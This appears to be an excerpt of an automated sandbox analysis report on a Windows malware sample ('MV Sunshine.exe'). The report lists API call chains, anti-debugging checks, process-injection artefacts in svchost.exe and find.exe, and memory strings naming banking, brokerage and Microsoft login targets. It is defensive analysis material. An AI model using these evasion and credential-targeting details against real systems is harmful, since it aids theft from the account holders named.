Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_0068F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0068F200
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_0068F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0068F35D
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_0068F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0068F65E
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_00683A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00683A2B
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_00683D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00683D4E
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_0068BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0068BF27
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0285C620 FindFirstFileW,FindNextFileW,FindClose,	4_2_0285C620

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_00624AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00624AFE

Source: 122-fVJ8.4.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: 122-fVJ8.4.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: 122-fVJ8.4.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: oVmFMrJhUAa.exe, 00000008.00000002.3965653573.0000000000DB9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
Source: 122-fVJ8.4.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 122-fVJ8.4.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: 122-fVJ8.4.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: find.exe, 00000004.00000002.3971171534.0000000007938000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware20,11696487552u
Source: 122-fVJ8.4.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: 122-fVJ8.4.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 122-fVJ8.4.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 122-fVJ8.4.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 122-fVJ8.4.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 122-fVJ8.4.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 122-fVJ8.4.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: find.exe, 00000004.00000002.3971171534.0000000007938000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20&/;
Source: find.exe, 00000004.00000002.3971171534.0000000007938000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,1
Source: firefox.exe, 0000000B.00000002.2587646991.000001E693A6C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll::
Source: 122-fVJ8.4.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: find.exe, 00000004.00000002.3971171534.0000000007938000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,116964
Source: 122-fVJ8.4.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: 122-fVJ8.4.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 122-fVJ8.4.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: find.exe, 00000004.00000002.3971171534.0000000007938000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: anara Transaction PasswordVMware20,11696487552x
Source: find.exe, 00000004.00000002.3971171534.0000000007938000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|V
Source: find.exe, 00000004.00000002.3971171534.0000000007938000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20X
Source: 122-fVJ8.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: find.exe, 00000004.00000002.3971171534.0000000007938000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ve Brokers - EU East & CentralVMware20,11696487552
Source: find.exe, 00000004.00000002.3964890835.0000000002A30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: find.exe, 00000004.00000002.3971171534.0000000007938000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: COM.HKVMware20,11696487552
Source: 122-fVJ8.4.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 122-fVJ8.4.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: find.exe, 00000004.00000002.3971171534.0000000007938000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,116j
Source: find.exe, 00000004.00000002.3971171534.0000000007938000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20&
Source: find.exe, 00000004.00000002.3971171534.0000000007938000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: formVMware20,11696487552
Source: 122-fVJ8.4.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 122-fVJ8.4.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: find.exe, 00000004.00000002.3971171534.0000000007938000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20
Source: find.exe, 00000004.00000002.3971171534.0000000007938000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rs - HKVMware20,11696487552]
Source: 122-fVJ8.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 122-fVJ8.4.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 122-fVJ8.4.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 122-fVJ8.4.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 122-fVJ8.4.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 122-fVJ8.4.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 122-fVJ8.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: 122-fVJ8.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 122-fVJ8.4.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\MV Sunshine.exe	API call chain: ExitProcess graph end node			graph_0-98722
Source: C:\Users\user\Desktop\MV Sunshine.exe	API call chain: ExitProcess graph end node			graph_0-98014

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0387096E rdtsc

2_2_0387096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417AA3 LdrLoadDll,

2_2_00417AA3

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_006941FD BlockInput,

0_2_006941FD

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_00623B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00623B4C

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_00655CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00655CCC

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_0069C304 LoadLibraryA,GetProcAddress,

0_2_0069C304

Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_00F62900 mov eax, dword ptr fs:[00000030h]	0_2_00F62900
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_00F63F70 mov eax, dword ptr fs:[00000030h]	0_2_00F63F70
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_00F63F10 mov eax, dword ptr fs:[00000030h]	0_2_00F63F10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]	2_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]	2_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]	2_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]	2_2_0385438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]	2_2_0385438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]	2_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]	2_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]	2_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EC3CD mov eax, dword ptr fs:[00000030h]	2_2_038EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]	2_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]	2_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]	2_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]	2_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B63C0 mov eax, dword ptr fs:[00000030h]	2_2_038B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]	2_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]	2_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]	2_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h]	2_2_038D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h]	2_2_038D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038663FF mov eax, dword ptr fs:[00000030h]	2_2_038663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]	2_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]	2_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]	2_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C310 mov ecx, dword ptr fs:[00000030h]	2_2_0382C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03850310 mov ecx, dword ptr fs:[00000030h]	2_2_03850310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]	2_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03908324 mov ecx, dword ptr fs:[00000030h]	2_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]	2_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]	2_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov ecx, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FA352 mov eax, dword ptr fs:[00000030h]	2_2_038FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D8350 mov ecx, dword ptr fs:[00000030h]	2_2_038D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390634F mov eax, dword ptr fs:[00000030h]	2_2_0390634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D437C mov eax, dword ptr fs:[00000030h]	2_2_038D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h]	2_2_0386E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h]	2_2_0386E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]	2_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]	2_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]	2_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039062D6 mov eax, dword ptr fs:[00000030h]	2_2_039062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]	2_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]	2_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]	2_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382823B mov eax, dword ptr fs:[00000030h]	2_2_0382823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B8243 mov eax, dword ptr fs:[00000030h]	2_2_038B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B8243 mov ecx, dword ptr fs:[00000030h]	2_2_038B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390625D mov eax, dword ptr fs:[00000030h]	2_2_0390625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A250 mov eax, dword ptr fs:[00000030h]	2_2_0382A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836259 mov eax, dword ptr fs:[00000030h]	2_2_03836259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EA250 mov eax, dword ptr fs:[00000030h]	2_2_038EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EA250 mov eax, dword ptr fs:[00000030h]	2_2_038EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]	2_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]	2_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]	2_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382826B mov eax, dword ptr fs:[00000030h]	2_2_0382826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03870185 mov eax, dword ptr fs:[00000030h]	2_2_03870185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h]	2_2_038EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h]	2_2_038EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h]	2_2_038D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h]	2_2_038D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]	2_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]	2_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]	2_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]	2_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]	2_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]	2_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]	2_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h]	2_2_038F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h]	2_2_038F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039061E5 mov eax, dword ptr fs:[00000030h]	2_2_039061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038601F8 mov eax, dword ptr fs:[00000030h]	2_2_038601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DA118 mov ecx, dword ptr fs:[00000030h]	2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]	2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]	2_2_038DA118
